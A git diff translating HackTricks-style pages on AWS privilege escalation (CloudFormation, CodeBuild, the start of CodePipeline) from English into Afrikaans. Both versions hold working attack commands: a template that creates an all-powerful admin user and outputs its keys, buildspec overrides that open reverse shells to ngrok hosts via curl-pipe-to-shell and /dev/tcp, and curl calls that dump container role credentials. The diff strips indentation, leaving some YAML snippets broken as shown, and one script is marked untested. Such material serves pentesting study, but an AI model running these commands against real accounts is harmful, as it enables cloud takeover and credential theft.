diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
index 39cba539e..2ba388c14 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
@@ -4,7 +4,7 @@
 
 ## cloudformation
 
-For more information about cloudformation check:
+Vir meer inligting oor cloudformation, kyk:
 
 {{#ref}}
 ../../aws-services/aws-cloudformation-and-codestar-enum.md
@@ -12,111 +12,99 @@ For more information about cloudformation check:
 
 ### `iam:PassRole`, `cloudformation:CreateStack`
 
-An attacker with these permissions **can escalate privileges** by crafting a **CloudFormation stack** with a custom template, hosted on their server, to **execute actions under the permissions of a specified role:**
-
+'n Aanvaller met hierdie toestemmings **kan voorregte verhoog** deur 'n **CloudFormation-stapel** te skep met 'n pasgemaakte sjabloon, gehos op hul bediener, om **aksies uit te voer onder die toestemmings van 'n gespesifiseerde rol:**
 ```bash
 aws cloudformation create-stack --stack-name <stack-name> \
-    --template-url http://attacker.com/attackers.template \
-    --role-arn <arn-role>
+--template-url http://attacker.com/attackers.template \
+--role-arn <arn-role>
 ```
-
-In the following page you have an **exploitation example** with the additional permission **`cloudformation:DescribeStacks`**:
+In die volgende bladsy het jy 'n **uitbuiting voorbeeld** met die bykomende toestemming **`cloudformation:DescribeStacks`**:
 
 {{#ref}}
 iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md
 {{#endref}}
 
-**Potential Impact:** Privesc to the cloudformation service role specified.
+**Potensiële Impak:** Privesc na die cloudformation diensrol wat gespesifiseer is.
 
 ### `iam:PassRole`, (`cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`)
 
-In this case you can a**buse an existing cloudformation stack** to update it and escalate privileges as in the previous scenario:
-
+In hierdie geval kan jy 'n **bestaande cloudformation stapel** misbruik om dit op te dateer en voorregte te verhoog soos in die vorige scenario:
 ```bash
 aws cloudformation update-stack \
-    --stack-name privesc \
-    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
-    --role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
-    --capabilities CAPABILITY_IAM \
-    --region eu-west-1
+--stack-name privesc \
+--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
+--role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
+--capabilities CAPABILITY_IAM \
+--region eu-west-1
 ```
+Die `cloudformation:SetStackPolicy` toestemming kan gebruik word om **jouself `UpdateStack` toestemming** oor 'n stapel te gee en die aanval uit te voer.
 
-The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack.
-
-**Potential Impact:** Privesc to the cloudformation service role specified.
+**Potensiële Impak:** Privesc na die cloudformation diensrol gespesifiseer.
 
 ### `cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`
 
-If you have this permission but **no `iam:PassRole`** you can still **update the stacks** used and abuse the **IAM Roles they have already attached**. Check the previous section for exploit example (just don't indicate any role in the update).
+As jy hierdie toestemming het maar **geen `iam:PassRole`** nie, kan jy steeds **die stapels** wat gebruik word opdateer en die **IAM Rolle wat hulle reeds aangeheg het** misbruik. Kyk na die vorige afdeling vir 'n eksploit voorbeeld (moet net nie enige rol in die opdatering aandui nie).
 
-The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack.
+Die `cloudformation:SetStackPolicy` toestemming kan gebruik word om **jouself `UpdateStack` toestemming** oor 'n stapel te gee en die aanval uit te voer.
 
-**Potential Impact:** Privesc to the cloudformation service role already attached.
+**Potensiële Impak:** Privesc na die cloudformation diensrol wat reeds aangeheg is.
 
 ### `iam:PassRole`,((`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`)
 
-An attacker with permissions to **pass a role and create & execute a ChangeSet** can **create/update a new cloudformation stack abuse the cloudformation service roles** just like with the CreateStack or UpdateStack.
-
-The following exploit is a **variation of the**[ **CreateStack one**](./#iam-passrole-cloudformation-createstack) using the **ChangeSet permissions** to create a stack.
+'n Aanvaller met toestemmings om **'n rol oor te dra en 'n ChangeSet te skep & uit te voer** kan **'n nuwe cloudformation stapel skep/opdateer en die cloudformation diensrolle misbruik** net soos met die CreateStack of UpdateStack.
 
+Die volgende eksploit is 'n **variasie van die**[ **CreateStack een**](./#iam-passrole-cloudformation-createstack) wat die **ChangeSet toestemmings** gebruik om 'n stapel te skep.
 ```bash
 aws cloudformation create-change-set \
-    --stack-name privesc \
-    --change-set-name privesc \
-    --change-set-type CREATE \
-    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
-    --role arn:aws:iam::947247140022:role/CloudFormationAdmin \
-    --capabilities CAPABILITY_IAM \
-    --region eu-west-1
+--stack-name privesc \
+--change-set-name privesc \
+--change-set-type CREATE \
+--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
+--role arn:aws:iam::947247140022:role/CloudFormationAdmin \
+--capabilities CAPABILITY_IAM \
+--region eu-west-1
 
 echo "Waiting 2 mins to change the stack"
 sleep 120
 
 aws cloudformation execute-change-set \
-    --change-set-name privesc \
-    --stack-name privesc \
-    --region eu-west-1
+--change-set-name privesc \
+--stack-name privesc \
+--region eu-west-1
 
 echo "Waiting 2 mins to execute the stack"
 sleep 120
 
 aws cloudformation describe-stacks \
-    --stack-name privesc \
-    --region eu-west-1
+--stack-name privesc \
+--region eu-west-1
 ```
+Die `cloudformation:SetStackPolicy` toestemming kan gebruik word om **vir jouself `ChangeSet` toestemmings** oor 'n stap te gee en die aanval uit te voer.
 
-The `cloudformation:SetStackPolicy` permission can be used to **give yourself `ChangeSet` permissions** over a stack and perform the attack.
-
-**Potential Impact:** Privesc to cloudformation service roles.
+**Potensiële Impak:** Privesc na cloudformation diensrolle.
 
 ### (`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`)
 
-This is like the previous method without passing **IAM roles**, so you can just **abuse already attached ones**, just modify the parameter:
-
+Dit is soos die vorige metode sonder om **IAM rolle** oor te dra, so jy kan net **alreeds aangehegte eenhede misbruik**, net die parameter aanpas:
 ```
 --change-set-type UPDATE
 ```
-
-**Potential Impact:** Privesc to the cloudformation service role already attached.
+**Potensiële Impak:** Privesc na die cloudformation diensrol wat reeds aangeheg is.
 
 ### `iam:PassRole`,(`cloudformation:CreateStackSet` | `cloudformation:UpdateStackSet`)
 
-An attacker could abuse these permissions to create/update StackSets to abuse arbitrary cloudformation roles.
+'n Aanvaller kan hierdie toestemmings misbruik om StackSets te skep/op te dateer om arbitrêre cloudformation rolle te misbruik.
 
-**Potential Impact:** Privesc to cloudformation service roles.
+**Potensiële Impak:** Privesc na cloudformation diensrolle.
 
 ### `cloudformation:UpdateStackSet`
 
-An attacker could abuse this permission without the passRole permission to update StackSets to abuse the attached cloudformation roles.
+'n Aanvaller kan hierdie toestemming misbruik sonder die passRole toestemming om StackSets op te dateer om die aangehegte cloudformation rolle te misbruik.
 
-**Potential Impact:** Privesc to the attached cloudformation roles.
+**Potensiële Impak:** Privesc na die aangehegte cloudformation rolle.
 
-## References
+## Verwysings
 
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md
index d41f9062c..c2b491f1f 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md
@@ -2,84 +2,74 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-An attacker could for example use a **cloudformation template** that generates **keys for an admin** user like:
-
+'n Aanvaller kan byvoorbeeld 'n **cloudformation-sjabloon** gebruik wat **sleutels vir 'n admin** gebruiker genereer soos:
 ```json
 {
-  "Resources": {
-    "AdminUser": {
-      "Type": "AWS::IAM::User"
-    },
-    "AdminPolicy": {
-      "Type": "AWS::IAM::ManagedPolicy",
-      "Properties": {
-        "Description": "This policy allows all actions on all resources.",
-        "PolicyDocument": {
-          "Version": "2012-10-17",
-          "Statement": [
-            {
-              "Effect": "Allow",
-              "Action": ["*"],
-              "Resource": "*"
-            }
-          ]
-        },
-        "Users": [
-          {
-            "Ref": "AdminUser"
-          }
-        ]
-      }
-    },
-    "MyUserKeys": {
-      "Type": "AWS::IAM::AccessKey",
-      "Properties": {
-        "UserName": {
-          "Ref": "AdminUser"
-        }
-      }
-    }
-  },
-  "Outputs": {
-    "AccessKey": {
-      "Value": {
-        "Ref": "MyUserKeys"
-      },
-      "Description": "Access Key ID of Admin User"
-    },
-    "SecretKey": {
-      "Value": {
-        "Fn::GetAtt": ["MyUserKeys", "SecretAccessKey"]
-      },
-      "Description": "Secret Key of Admin User"
-    }
-  }
+"Resources": {
+"AdminUser": {
+"Type": "AWS::IAM::User"
+},
+"AdminPolicy": {
+"Type": "AWS::IAM::ManagedPolicy",
+"Properties": {
+"Description": "This policy allows all actions on all resources.",
+"PolicyDocument": {
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Action": ["*"],
+"Resource": "*"
+}
+]
+},
+"Users": [
+{
+"Ref": "AdminUser"
+}
+]
+}
+},
+"MyUserKeys": {
+"Type": "AWS::IAM::AccessKey",
+"Properties": {
+"UserName": {
+"Ref": "AdminUser"
+}
+}
+}
+},
+"Outputs": {
+"AccessKey": {
+"Value": {
+"Ref": "MyUserKeys"
+},
+"Description": "Access Key ID of Admin User"
+},
+"SecretKey": {
+"Value": {
+"Fn::GetAtt": ["MyUserKeys", "SecretAccessKey"]
+},
+"Description": "Secret Key of Admin User"
+}
+}
 }
 ```
-
-Then **generate the cloudformation stack**:
-
+Dan **genereer die cloudformation stap**:
 ```bash
 aws cloudformation create-stack --stack-name privesc \
-    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
-    --role arn:aws:iam::[REDACTED]:role/adminaccess \
-    --capabilities CAPABILITY_IAM --region us-west-2
+--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
+--role arn:aws:iam::[REDACTED]:role/adminaccess \
+--capabilities CAPABILITY_IAM --region us-west-2
 ```
-
-**Wait for a couple of minutes** for the stack to be generated and then **get the output** of the stack where the **credentials are stored**:
-
+**Wag vir 'n paar minute** vir die stap om gegenereer te word en dan **kry die uitvoer** van die stap waar die **bewyse gestoor word**:
 ```bash
 aws cloudformation describe-stacks \
-    --stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \
-    --region uswest-2
+--stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \
+--region uswest-2
 ```
-
-### References
+### Verwysings
 
 - [https://bishopfox.com/blog/privilege-escalation-in-aws](https://bishopfox.com/blog/privilege-escalation-in-aws)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
index b179bec22..7483fb8d0 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
@@ -4,7 +4,7 @@
 
 ## codebuild
 
-Get more info in:
+Kry meer inligting in:
 
 {{#ref}}
 ../aws-services/aws-codebuild-enum.md
@@ -12,70 +12,65 @@ Get more info in:
 
 ### `codebuild:StartBuild` | `codebuild:StartBuildBatch`
 
-Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project:
+Slegs met een van hierdie toestemmings is dit genoeg om 'n bou te aktiveer met 'n nuwe buildspec en die token van die iam rol wat aan die projek toegeken is, te steel:
 
 {{#tabs }}
 {{#tab name="StartBuild" }}
-
 ```bash
 cat > /tmp/buildspec.yml <<EOF
 version: 0.2
 
 phases:
-  build:
-      commands:
-            - curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
+build:
+commands:
+- curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
 EOF
 
 aws codebuild start-build --project <project-name> --buildspec-override file:///tmp/buildspec.yml
 ```
-
 {{#endtab }}
 
 {{#tab name="StartBuildBatch" }}
-
 ```bash
 cat > /tmp/buildspec.yml <<EOF
 version: 0.2
 
 batch:
-  fast-fail: false
-  build-list:
-    - identifier: build1
-      env:
-        variables:
-          BUILD_ID: build1
-      buildspec: |
-        version: 0.2
-        env:
-          shell: sh
-        phases:
-          build:
-            commands:
-              - curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
-      ignore-failure: true
+fast-fail: false
+build-list:
+- identifier: build1
+env:
+variables:
+BUILD_ID: build1
+buildspec: |
+version: 0.2
+env:
+shell: sh
+phases:
+build:
+commands:
+- curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
+ignore-failure: true
 EOF
 
 aws codebuild start-build-batch --project <project-name> --buildspec-override file:///tmp/buildspec.yml
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-**Note**: The difference between these two commands is that:
+**Let wel**: Die verskil tussen hierdie twee opdragte is dat:
 
-- `StartBuild` triggers a single build job using a specific `buildspec.yml`.
-- `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel).
+- `StartBuild` aktiveer 'n enkele bouwerk met 'n spesifieke `buildspec.yml`.
+- `StartBuildBatch` laat jou toe om 'n batch van bouwerke te begin, met meer komplekse konfigurasies (soos om verskeie bouwerke gelyktydig te laat loop).
 
-**Potential Impact:** Direct privesc to attached AWS Codebuild roles.
+**Potensiële Impak:** Direkte privesc na aangehegte AWS Codebuild rolle.
 
 ### `iam:PassRole`, `codebuild:CreateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
 
-An attacker with the **`iam:PassRole`, `codebuild:CreateProject`, and `codebuild:StartBuild` or `codebuild:StartBuildBatch`** permissions would be able to **escalate privileges to any codebuild IAM role** by creating a running one.
+'n Aanvaller met die **`iam:PassRole`, `codebuild:CreateProject`, en `codebuild:StartBuild` of `codebuild:StartBuildBatch`** toestemmings sal in staat wees om **privileges te eskaleer na enige codebuild IAM rol** deur 'n lopende een te skep.
 
 {{#tabs }}
 {{#tab name="Example1" }}
-
 ```bash
 # Enumerate then env and get creds
 REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
@@ -84,20 +79,20 @@ REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATI
 REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"
 
 JSON="{
-    \"name\": \"codebuild-demo-project\",
-    \"source\": {
-        \"type\": \"NO_SOURCE\",
-        \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
-    },
-    \"artifacts\": {
-        \"type\": \"NO_ARTIFACTS\"
-    },
-    \"environment\": {
-        \"type\": \"LINUX_CONTAINER\",
-        \"image\": \"aws/codebuild/standard:1.0\",
-        \"computeType\": \"BUILD_GENERAL1_SMALL\"
-    },
-    \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
+\"name\": \"codebuild-demo-project\",
+\"source\": {
+\"type\": \"NO_SOURCE\",
+\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
+},
+\"artifacts\": {
+\"type\": \"NO_ARTIFACTS\"
+},
+\"environment\": {
+\"type\": \"LINUX_CONTAINER\",
+\"image\": \"aws/codebuild/standard:1.0\",
+\"computeType\": \"BUILD_GENERAL1_SMALL\"
+},
+\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
 }"
 
 
@@ -117,19 +112,17 @@ aws codebuild start-build --project-name codebuild-demo-project
 # Delete the project
 aws codebuild delete-project --name codebuild-demo-project
 ```
-
 {{#endtab }}
 
-{{#tab name="Example2" }}
-
+{{#tab name="Voorbeeld2" }}
 ```bash
 # Generated by AI, not tested
 # Create a buildspec.yml file with reverse shell command
 echo 'version: 0.2
 phases:
-  build:
-    commands:
-      - curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash' > buildspec.yml
+build:
+commands:
+- curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash' > buildspec.yml
 
 # Upload the buildspec to the bucket and give access to everyone
 aws s3 cp buildspec.yml s3:<S3_BUCKET_NAME>/buildspec.yml
@@ -141,25 +134,23 @@ aws codebuild create-project --name reverse-shell-project --source type=S3,locat
 aws codebuild start-build --project-name reverse-shell-project
 
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact:** Direct privesc to any AWS Codebuild role.
+**Potensiële Impak:** Direkte privesc na enige AWS Codebuild rol.
 
 > [!WARNING]
-> In a **Codebuild container** the file `/codebuild/output/tmp/env.sh` contains all the env vars needed to access the **metadata credentials**.
+> In 'n **Codebuild-container** bevat die lêer `/codebuild/output/tmp/env.sh` al die omgewing veranderlikes wat nodig is om toegang te verkry tot die **metadata-akkrediteerings**.
 
-> This file contains the **env variable `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** which contains the **URL path** to access the credentials. It will be something like this `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420`
+> Hierdie lêer bevat die **omgewing veranderlike `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** wat die **URL-pad** bevat om toegang tot die akkrediteerings te verkry. Dit sal iets soos hierdie wees `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420`
 
-> Add that to the URL **`http://169.254.170.2/`** and you will be able to dump the role credentials.
+> Voeg dit by die URL **`http://169.254.170.2/`** en jy sal in staat wees om die rol akkrediteerings te dump.
 
-> Moreover, it also contains the **env variable `ECS_CONTAINER_METADATA_URI`** which contains the complete URL to get **metadata info about the container**.
+> Boonop bevat dit ook die **omgewing veranderlike `ECS_CONTAINER_METADATA_URI`** wat die volledige URL bevat om **metadata-inligting oor die container** te verkry.
 
 ### `iam:PassRole`, `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
 
-Just like in the previous section, if instead of creating a build project you can modify it, you can indicate the IAM Role and steal the token
-
+Net soos in die vorige afdeling, as jy in plaas daarvan om 'n bouprojek te skep, dit kan wysig, kan jy die IAM Rol aandui en die token steel.
 ```bash
 REV_PATH="/tmp/codebuild_pwn.json"
 
@@ -171,20 +162,20 @@ REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"
 
 # You need to indicate the name of the project you want to modify
 JSON="{
-    \"name\": \"<codebuild-demo-project>\",
-    \"source\": {
-        \"type\": \"NO_SOURCE\",
-        \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
-    },
-    \"artifacts\": {
-        \"type\": \"NO_ARTIFACTS\"
-    },
-    \"environment\": {
-        \"type\": \"LINUX_CONTAINER\",
-        \"image\": \"aws/codebuild/standard:1.0\",
-        \"computeType\": \"BUILD_GENERAL1_SMALL\"
-    },
-    \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
+\"name\": \"<codebuild-demo-project>\",
+\"source\": {
+\"type\": \"NO_SOURCE\",
+\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
+},
+\"artifacts\": {
+\"type\": \"NO_ARTIFACTS\"
+},
+\"environment\": {
+\"type\": \"LINUX_CONTAINER\",
+\"image\": \"aws/codebuild/standard:1.0\",
+\"computeType\": \"BUILD_GENERAL1_SMALL\"
+},
+\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
 }"
 
 printf "$JSON" > $REV_PATH
@@ -193,16 +184,14 @@ aws codebuild update-project --cli-input-json file://$REV_PATH
 
 aws codebuild start-build --project-name codebuild-demo-project
 ```
-
-**Potential Impact:** Direct privesc to any AWS Codebuild role.
+**Potensiële Impak:** Direkte privesc na enige AWS Codebuild rol.
 
 ### `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
 
-Like in the previous section but **without the `iam:PassRole` permission**, you can abuse this permissions to **modify existing Codebuild projects and access the role they already have assigned**.
+Soos in die vorige afdeling, maar **sonder die `iam:PassRole` toestemming**, kan jy hierdie toestemmings misbruik om **bestaande Codebuild projekte te wysig en toegang te verkry tot die rol wat hulle reeds toegeken het**.
 
 {{#tabs }}
 {{#tab name="StartBuild" }}
-
 ```sh
 REV_PATH="/tmp/codebuild_pwn.json"
 
@@ -213,20 +202,20 @@ REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATI
 REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"
 
 JSON="{
-    \"name\": \"<codebuild-demo-project>\",
-    \"source\": {
-        \"type\": \"NO_SOURCE\",
-        \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
-    },
-    \"artifacts\": {
-        \"type\": \"NO_ARTIFACTS\"
-    },
-    \"environment\": {
-        \"type\": \"LINUX_CONTAINER\",
-        \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
-        \"computeType\": \"BUILD_GENERAL1_SMALL\",
-        \"imagePullCredentialsType\": \"CODEBUILD\"
-    }
+\"name\": \"<codebuild-demo-project>\",
+\"source\": {
+\"type\": \"NO_SOURCE\",
+\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
+},
+\"artifacts\": {
+\"type\": \"NO_ARTIFACTS\"
+},
+\"environment\": {
+\"type\": \"LINUX_CONTAINER\",
+\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
+\"computeType\": \"BUILD_GENERAL1_SMALL\",
+\"imagePullCredentialsType\": \"CODEBUILD\"
+}
 }"
 
 # Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!
@@ -237,11 +226,9 @@ aws codebuild update-project --cli-input-json file://$REV_PATH
 
 aws codebuild start-build --project-name codebuild-demo-project
 ```
-
 {{#endtab }}
 
 {{#tab name="StartBuildBatch" }}
-
 ```sh
 REV_PATH="/tmp/codebuild_pwn.json"
 
@@ -250,20 +237,20 @@ REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"
 
 # You need to indicate the name of the project you want to modify
 JSON="{
-    \"name\": \"project_name\",
-    \"source\": {
-        \"type\": \"NO_SOURCE\",
-        \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n  fast-fail: false\\\\n  build-list:\\\\n    - identifier: build1\\\\n      env:\\\\n        variables:\\\\n          BUILD_ID: build1\\\\n      buildspec: |\\\\n        version: 0.2\\\\n        env:\\\\n          shell: sh\\\\n        phases:\\\\n          build:\\\\n            commands:\\\\n              - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n      ignore-failure: true\\\\n\"
-    },
-    \"artifacts\": {
-        \"type\": \"NO_ARTIFACTS\"
-    },
-    \"environment\": {
-        \"type\": \"LINUX_CONTAINER\",
-        \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
-        \"computeType\": \"BUILD_GENERAL1_SMALL\",
-        \"imagePullCredentialsType\": \"CODEBUILD\"
-    }
+\"name\": \"project_name\",
+\"source\": {
+\"type\": \"NO_SOURCE\",
+\"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n  fast-fail: false\\\\n  build-list:\\\\n    - identifier: build1\\\\n      env:\\\\n        variables:\\\\n          BUILD_ID: build1\\\\n      buildspec: |\\\\n        version: 0.2\\\\n        env:\\\\n          shell: sh\\\\n        phases:\\\\n          build:\\\\n            commands:\\\\n              - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n      ignore-failure: true\\\\n\"
+},
+\"artifacts\": {
+\"type\": \"NO_ARTIFACTS\"
+},
+\"environment\": {
+\"type\": \"LINUX_CONTAINER\",
+\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
+\"computeType\": \"BUILD_GENERAL1_SMALL\",
+\"imagePullCredentialsType\": \"CODEBUILD\"
+}
 }"
 
 printf "$JSON" > $REV_PATH
@@ -274,41 +261,37 @@ aws codebuild update-project --cli-input-json file://$REV_PATH
 
 aws codebuild start-build-batch --project-name codebuild-demo-project
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact:** Direct privesc to attached AWS Codebuild roles.
+**Potensiële Impak:** Direkte privesc na aangehegte AWS Codebuild rolle.
 
 ### SSM
 
-Having **enough permissions to start a ssm session** it's possible to get **inside a Codebuild project** being built.
+Om **genoeg regte te hê om 'n ssm-sessie te begin** is dit moontlik om **binne 'n Codebuild-projek** wat gebou word, te kom.
 
-The codebuild project will need to have a breakpoint:
+Die codebuild-projek sal 'n breekpunt moet hê:
 
 <pre class="language-yaml"><code class="lang-yaml">phases:
-  pre_build:
-    commands:
-      - echo Entered the pre_build phase...
-      - echo "Hello World" > /tmp/hello-world
+pre_build:
+commands:
+- echo Betree die pre_build fase...
+- echo "Hello World" > /tmp/hello-world
 <strong>      - codebuild-breakpoint
 </strong></code></pre>
 
-And then:
-
+En dan:
 ```bash
 aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
 aws ssm start-session --target <sessionTarget> --region <region>
 ```
-
 For more info [**check the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/session-manager.html).
 
 ### (`codebuild:StartBuild` | `codebuild:StartBuildBatch`), `s3:GetObject`, `s3:PutObject`
 
-An attacker able to start/restart a build of a specific CodeBuild project which stores its `buildspec.yml` file on an S3 bucket the attacker has write access to, can obtain command execution in the CodeBuild process.
-
-Note: the escalation is relevant only if the CodeBuild worker has a different role, hopefully more privileged, than the one of the attacker.
+'n Aanvaller wat in staat is om 'n spesifieke CodeBuild-projek se bou te begin/herbegin wat sy `buildspec.yml`-lêer op 'n S3-bucket stoor waartoe die aanvaller skryfrechten het, kan opdragte uitvoer in die CodeBuild-proses verkry.
 
+Let wel: die eskalasie is slegs relevant as die CodeBuild-werker 'n ander rol het, hoopvol meer bevoorreg, as dié van die aanvaller.
 ```bash
 aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./
 
@@ -325,29 +308,22 @@ aws codebuild start-build --project-name <project-name>
 
 # Wait for the reverse shell :)
 ```
-
-You can use something like this **buildspec** to get a **reverse shell**:
-
+Jy kan iets soos hierdie **buildspec** gebruik om 'n **reverse shell** te kry:
 ```yaml:buildspec.yml
 version: 0.2
 
 phases:
-  build:
-    commands:
-      - bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1
+build:
+commands:
+- bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1
 ```
-
-**Impact:** Direct privesc to the role used by the AWS CodeBuild worker that usually has high privileges.
+**Impak:** Direkte privesc na die rol wat deur die AWS CodeBuild werker gebruik word, wat gewoonlik hoë bevoegdhede het.
 
 > [!WARNING]
-> Note that the buildspec could be expected in zip format, so an attacker would need to download, unzip, modify the `buildspec.yml` from the root directory, zip again and upload
+> Let daarop dat die buildspec in zip-formaat verwag kan word, so 'n aanvaller sal moet aflaai, uitpak, die `buildspec.yml` vanaf die wortelgids wysig, weer zip en oplaai.
 
-More details could be found [here](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/).
+Meer besonderhede kan [hier](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/) gevind word.
 
-**Potential Impact:** Direct privesc to attached AWS Codebuild roles.
+**Potensiële Impak:** Direkte privesc na aangehegte AWS Codebuild rolle.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md
index 0662ae9e2..8ebad76f5 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md
@@ -4,7 +4,7 @@
 
 ## codepipeline
 
-For more info about codepipeline check:
+Vir meer inligting oor codepipeline, kyk:
 
 {{#ref}}
 ../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
@@ -12,13 +12,13 @@ For more info about codepipeline check:
 
 ### `iam:PassRole`, `codepipeline:CreatePipeline`, `codebuild:CreateProject, codepipeline:StartPipelineExecution`
 
-When creating a code pipeline you can indicate a **codepipeline IAM Role to run**, therefore you could compromise them.
